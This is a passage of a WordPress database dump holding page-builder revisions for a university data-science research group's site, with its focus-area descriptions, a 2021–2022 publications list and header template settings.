style-local-20-c8\">\n <!---->\n <!---->\n <h1 class=\"\">Focus Areas</h1>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"20-c9\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c9 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c10-outer\">\n <div data-colibri-id=\"20-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c10 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c11\" class=\"h-icon style-274 style-local-20-c11 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c11-icon\"><!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path>\n </svg></span></div>\n <div data-colibri-id=\"20-c12\" class=\"h-global-transition-all h-heading style-275 style-local-20-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c12\">\n <!---->\n <!---->\n <h5 class=\"\">disease & disaster modeling</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c13\" class=\"h-text h-text-component style-276 style-local-20-c13 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c14-outer\">\n <div data-colibri-id=\"20-c14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c15\" class=\"h-icon style-274 style-local-20-c15 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c15-icon\"><!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\">\n <path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path>\n </svg></span></div>\n <div data-colibri-id=\"20-c16\" class=\"h-global-transition-all h-heading style-275 style-local-20-c16 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c16\">\n <!---->\n <!---->\n <h5 class=\"\">data as a service</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c17\" class=\"h-text h-text-component style-276 style-local-20-c17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c18-outer\">\n <div data-colibri-id=\"20-c18\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c18 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c19\" class=\"h-icon style-274 style-local-20-c19 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c19-icon\"><!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\">\n <path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path>\n </svg></span></div>\n <div data-colibri-id=\"20-c20\" class=\"h-global-transition-all h-heading style-275 style-local-20-c20 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c20\">\n <!---->\n <!---->\n <h5 class=\"\">Impact assessment</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c21\" class=\"h-text h-text-component style-276 style-local-20-c21 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2023-09-29 10:23:19','2023-09-29 14:23:19','',20,'https://gsudice.dataconn.net/?p=1430',0,'revision','',0),(1433,1,'2023-09-29 10:23:19','2023-09-29 14:23:19','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"608-c4\",\"parentId\":\"608-c3\",\"partialId\":608,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"608-c4\",\"index\":0,\"id\":\"608-c5\",\"partialId\":608,\"styleRef\":420,\"type\":\"content\",\"props\":{\"content\":\"<p><strong>2022<\\/strong><\\/p><p>Atkinson, S. F., Kala, A. K., & Tiwari, C. (2022). Cascading effects of COVID-19 on population mobility and air quality: An exploration including place characteristics using geovisualization. Geospatial Health, 17(s1).<\\/p><p>Angelique B.Willis, Mildred Addo, Lauren E.Yoder, Cassandra K. Johnson, Sydney L. Resler, Leticia J. Young, Elizabeth Armstrong-Mensah(2022). Individual and <span>Community Level Factors Related to Sanitation, Water Quality, Treatment and Management in Rural Communities in Accra, Ghana: A Field Study Report.<\\/span><\\/p><p>Parcells, R. 2022. Aedes Mosquito Early Warning System: Challenges Integrating Public Health Surveillance Data. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Schuh, E. 2022. Building a resilient energy grid: development of an urban-scale model for energy prediction. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Anand, A. 2022. Aedes Mosquito Early Warning System: Integrating Disparate Environmental Datasets. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Garland, R. 2022. GSU (Georgia State University) Contact Networks and Interventions. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>McDaniel, Emma L; Henry Phan; Puneet Singh; Chetan Tiwari; and Armin R Mikler. 2022. Evaluating Potential Exposure Risk to Gastrointestinal Disease-Causing Specimens after Documented Wastewater Spills in Atlanta. Poster presented at: American Association of Geographers, Annual Meeting 2022.<\\/p><p><br><\\/p><p><strong>2021<\\/strong><\\/p><p>Northeim, K., Tiwari, C., & Oppong, J. (2021). Surface ozone monitoring and policy: A geospatial decision support tool for suitable location of monitoring stations in urban areas. Environmental Science & Policy, 126, 48-59.<\\/p><p>Gwalani, H., Tiwari, C., & Mikler, A. R. (2021). Evaluation of heuristics for the p-median problem: Scale and spatial demand distribution. Computers, Environment and Urban Systems, 88, 101656.<\\/p><p>Torres, A. V., Tiwari, C., & Atkinson, S. F. (2021). Progress in ecosystem services research: A guide for scholars and practitioners. Ecosystem Services, 49, 101267.<\\/p><p>Northeim, K., Marks, C., & Tiwari, C. (2021). Evaluating spatial patterns of seasonal ozone exposure and incidence of respiratory emergency room visits in Dallas-Fort Worth. PeerJ, 9, e11066.<\\/p><p>Haynes, D., & Tiwari, C. (2021). Space-time Classification Index for Assessing COVID-19 Hotspots. medRxiv.<\\/p><p>Oppong, J., & Tiwari, C. (2021). GIS and Spatial Representations: Challenges and Missteps. In COVID-19 and Similar Futures (pp. 417-422). Springer, Cham.<\\/p><p>O\\u2019Neill, M., Poole, M., & Mikler, A. R. (2021). A Synergistic Approach to Data-Driven Response Planning. Disaster medicine and public health preparedness, 15(2), 232-238.<\\/p><p>Irany, F. A., Iyer, A., Flores, R. B., & Mikler, A. R. (2021). The Multi-phase spatial meta-heuristic algorithm for public health emergency transportation. arXiv preprint arXiv:2107.04125.<\\/p><p>Qian, W., Bhowmick, S., O\\u2019Neill, M., Ramisetty-Mikler, S., & Mikler, A. R. (2021). Applying a Probabilistic Infection Model for studying contagion processes in contact networks. Journal of Computational Science, 54, 101419.<\\/p><p>Gu, Q., Formby, D., Ji, S., Saltaformaggio, B., Bourgeois, A., & Beyah, R. A. (2021). This Hacker Knows Physics: Device Physics Aware Mimicry Attacks in Cyber-Physical Systems. IEEE Transactions on Dependable and Secure Computing.<\\/p><p>Huang, Y., Cai, Z., Pang, J., Xie, Z., & Bourgeois, A. G. (2021, June). Game Theory Based Privacy Protection for Context-Aware Services with Long-Term Time Series Data. In ICC 2021-IEEE International Conference on Communications (pp. 1-6). IEEE.<\\/p><p>Rosen, A., Levin, B., & Bourgeois, A. G. (2021, June). Autonomous Load Balancing in Distributed Hash Tables Using Churn and the Sybil Attack. In 2021 IEEE International Parallel and Distributed Processing Symposium Workshops (IPDPSW) (pp. 631-640). IEEE.<\\/p><p>Tharpe, B., Bourgeois, A. G., & Ashok, A. (2021, June). A do-it-yourself computer vision based robotic ball throw trainer. In Proceedings of the 19th Annual International Conference on Mobile Systems, Applications, and Services (pp. 505-506).<\\/p><p>Huang, Y., Li, W., Wang, J., Cai, Z., & Bourgeois, A. G. (2021). Privacy protection among three antithetic-parties for context-aware services. Journal of Network and Computer Applications, 191, 103115.<\\/p><p>Sidharthan, S., Ashok, A., & Bourgeois, A. (2021, October). Internet service via UAV: user centric comprehensive attack surface analysis. In Proceedings of the 12th ACM Wireless of the Students, by the Students, and for the Students (S3) Workshop (pp. 1-2).<\\/p><p>Younis, A. A., Sunderraman, R., Metzler, M., & Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.<\\/p><p>Ye, H., Yang, X., Takac, M., Sunderraman, R., & Ji, S. (2021). Improving text-to-image synthesis using contrastive learning. arXiv preprint arXiv:2107.02423.<\\/p><p>Abeysinghe, B., Shah, D., Freas, C., Harrison, R., & Sunderraman, R. (2021). POSLAN: Disentangling Chat with Positional and Language encoded Post Embeddings. arXiv preprint arXiv:2107.03529.<\\/p><p>Srimath, S., Ye, Y., Sarker, K., Sunderraman, R., & Ji, S. (2021, October). Human Activity Recognition from RGB Video Streams Using 1D-CNNs. In 2021 IEEE SmartWorld, Ubiquitous Intelligence & Computing, Advanced & Trusted Computing, Scalable Computing & Communications, Internet of People and Smart City Innovation (SmartWorld\\/SCALCOM\\/UIC\\/ATC\\/IOP\\/SCI) (pp. 295-302). IEEE.<\\/p><p>Younis, A. A., Sunderraman, R., Metzler, M., & Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.<\\/p><p>Kleinsasser, M., Tharpe, B., Akula, N., Tirumani, H., Sunderraman, R., & Bourgeois, A. G. (2022, January). Detecting and Predicting Sleep Activity using Biometric Sensor Data. In 2022 14th International Conference on COMmunication Systems & NETworkS (COMSNETS) (pp. 19-24). IEEE.<\\/p>\"}}],\"styleRef\":419,\"type\":\"content\"}],\"id\":\"608-c3\",\"parentId\":\"608-c2\",\"partialId\":608,\"styleRef\":418,\"type\":\"content\"}],\"id\":\"608-c2\",\"parentId\":\"608-c1\",\"partialId\":608,\"styleRef\":417,\"type\":\"content\"}],\"id\":\"608-c1\",\"partialId\":608,\"styleRef\":413,\"type\":\"content\"}','','','inherit','closed','closed','','612-revision-v1','','','2023-09-29 10:23:19','2023-09-29 14:23:19','',612,'https://gsudice.dataconn.net/?p=1433',0,'revision','',0),(1434,1,'2023-09-29 10:23:19','2023-09-29 14:23:19','<div data-colibri-id=\"608-c1\" class=\"style-413 style-local-608-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"608-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-417 style-local-608-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"608-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-418 style-local-608-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-419-outer style-local-608-c4-outer\">\n <div data-colibri-id=\"608-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-419 style-local-608-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"608-c5\" class=\"h-text h-text-component style-420 style-local-608-c5 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p><strong>2022</strong></p>\n <p>Atkinson, S. F., Kala, A. K., & Tiwari, C. (2022). Cascading effects of COVID-19 on population mobility and air quality: An exploration including place characteristics using geovisualization. Geospatial Health, 17(s1).</p>\n <p>Angelique B.Willis, Mildred Addo, Lauren E.Yoder, Cassandra K. Johnson, Sydney L. Resler, Leticia J. Young, Elizabeth Armstrong-Mensah(2022). Individual and <span>Community Level Factors Related to Sanitation, Water Quality, Treatment and Management in Rural Communities in Accra, Ghana: A Field Study Report.</span></p>\n <p>Parcells, R. 2022. Aedes Mosquito Early Warning System: Challenges Integrating Public Health Surveillance Data. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n <p>Schuh, E. 2022. Building a resilient energy grid: development of an urban-scale model for energy prediction. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n <p>Anand, A. 2022. Aedes Mosquito Early Warning System: Integrating Disparate Environmental Datasets. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n <p>Garland, R. 2022. GSU (Georgia State University) Contact Networks and Interventions. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n <p>McDaniel, Emma L; Henry Phan; Puneet Singh; Chetan Tiwari; and Armin R Mikler. 2022. Evaluating Potential Exposure Risk to Gastrointestinal Disease-Causing Specimens after Documented Wastewater Spills in Atlanta. Poster presented at:\n American Association of Geographers, Annual Meeting 2022.</p>\n <p>\n <br>\n </p>\n <p><strong>2021</strong></p>\n <p>Northeim, K., Tiwari, C., & Oppong, J. (2021). Surface ozone monitoring and policy: A geospatial decision support tool for suitable location of monitoring stations in urban areas. Environmental Science & Policy, 126, 48-59.</p>\n <p>Gwalani, H., Tiwari, C., & Mikler, A. R. (2021). Evaluation of heuristics for the p-median problem: Scale and spatial demand distribution. Computers, Environment and Urban Systems, 88, 101656.</p>\n <p>Torres, A. V., Tiwari, C., & Atkinson, S. F. (2021). Progress in ecosystem services research: A guide for scholars and practitioners. Ecosystem Services, 49, 101267.</p>\n <p>Northeim, K., Marks, C., & Tiwari, C. (2021). Evaluating spatial patterns of seasonal ozone exposure and incidence of respiratory emergency room visits in Dallas-Fort Worth. PeerJ, 9, e11066.</p>\n <p>Haynes, D., & Tiwari, C. (2021). Space-time Classification Index for Assessing COVID-19 Hotspots. medRxiv.</p>\n <p>Oppong, J., & Tiwari, C. (2021). GIS and Spatial Representations: Challenges and Missteps. In COVID-19 and Similar Futures (pp. 417-422). Springer, Cham.</p>\n <p>O’Neill, M., Poole, M., & Mikler, A. R. (2021). A Synergistic Approach to Data-Driven Response Planning. Disaster medicine and public health preparedness, 15(2), 232-238.</p>\n <p>Irany, F. A., Iyer, A., Flores, R. B., & Mikler, A. R. (2021). The Multi-phase spatial meta-heuristic algorithm for public health emergency transportation. arXiv preprint arXiv:2107.04125.</p>\n <p>Qian, W., Bhowmick, S., O’Neill, M., Ramisetty-Mikler, S., & Mikler, A. R. (2021). Applying a Probabilistic Infection Model for studying contagion processes in contact networks. Journal of Computational Science, 54, 101419.</p>\n <p>Gu, Q., Formby, D., Ji, S., Saltaformaggio, B., Bourgeois, A., & Beyah, R. A. (2021). This Hacker Knows Physics: Device Physics Aware Mimicry Attacks in Cyber-Physical Systems. IEEE Transactions on Dependable and Secure Computing.</p>\n <p>Huang, Y., Cai, Z., Pang, J., Xie, Z., & Bourgeois, A. G. (2021, June). Game Theory Based Privacy Protection for Context-Aware Services with Long-Term Time Series Data. In ICC 2021-IEEE International Conference on Communications\n (pp. 1-6). IEEE.</p>\n <p>Rosen, A., Levin, B., & Bourgeois, A. G. (2021, June). Autonomous Load Balancing in Distributed Hash Tables Using Churn and the Sybil Attack. In 2021 IEEE International Parallel and Distributed Processing Symposium Workshops (IPDPSW)\n (pp. 631-640). IEEE.</p>\n <p>Tharpe, B., Bourgeois, A. G., & Ashok, A. (2021, June). A do-it-yourself computer vision based robotic ball throw trainer. In Proceedings of the 19th Annual International Conference on Mobile Systems, Applications, and Services\n (pp. 505-506).</p>\n <p>Huang, Y., Li, W., Wang, J., Cai, Z., & Bourgeois, A. G. (2021). Privacy protection among three antithetic-parties for context-aware services. Journal of Network and Computer Applications, 191, 103115.</p>\n <p>Sidharthan, S., Ashok, A., & Bourgeois, A. (2021, October). Internet service via UAV: user centric comprehensive attack surface analysis. In Proceedings of the 12th ACM Wireless of the Students, by the Students, and for the Students\n (S3) Workshop (pp. 1-2).</p>\n <p>Younis, A. A., Sunderraman, R., Metzler, M., & Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\n <p>Ye, H., Yang, X., Takac, M., Sunderraman, R., & Ji, S. (2021). Improving text-to-image synthesis using contrastive learning. arXiv preprint arXiv:2107.02423.</p>\n <p>Abeysinghe, B., Shah, D., Freas, C., Harrison, R., & Sunderraman, R. (2021). POSLAN: Disentangling Chat with Positional and Language encoded Post Embeddings. arXiv preprint arXiv:2107.03529.</p>\n <p>Srimath, S., Ye, Y., Sarker, K., Sunderraman, R., & Ji, S. (2021, October). Human Activity Recognition from RGB Video Streams Using 1D-CNNs. In 2021 IEEE SmartWorld, Ubiquitous Intelligence & Computing, Advanced & Trusted\n Computing, Scalable Computing & Communications, Internet of People and Smart City Innovation (SmartWorld/SCALCOM/UIC/ATC/IOP/SCI) (pp. 295-302). IEEE.</p>\n <p>Younis, A. A., Sunderraman, R., Metzler, M., & Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\n <p>Kleinsasser, M., Tharpe, B., Akula, N., Tirumani, H., Sunderraman, R., & Bourgeois, A. G. (2022, January). Detecting and Predicting Sleep Activity using Biometric Sensor Data. In 2022 14th International Conference on COMmunication\n Systems & NETworkS (COMSNETS) (pp. 19-24). IEEE.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Publications','','inherit','closed','closed','','608-revision-v1','','','2023-09-29 10:23:19','2023-09-29 14:23:19','',608,'https://gsudice.dataconn.net/?p=1434',0,'revision','',0),(1435,1,'2023-09-29 10:23:19','2023-09-29 14:23:19','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>© 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"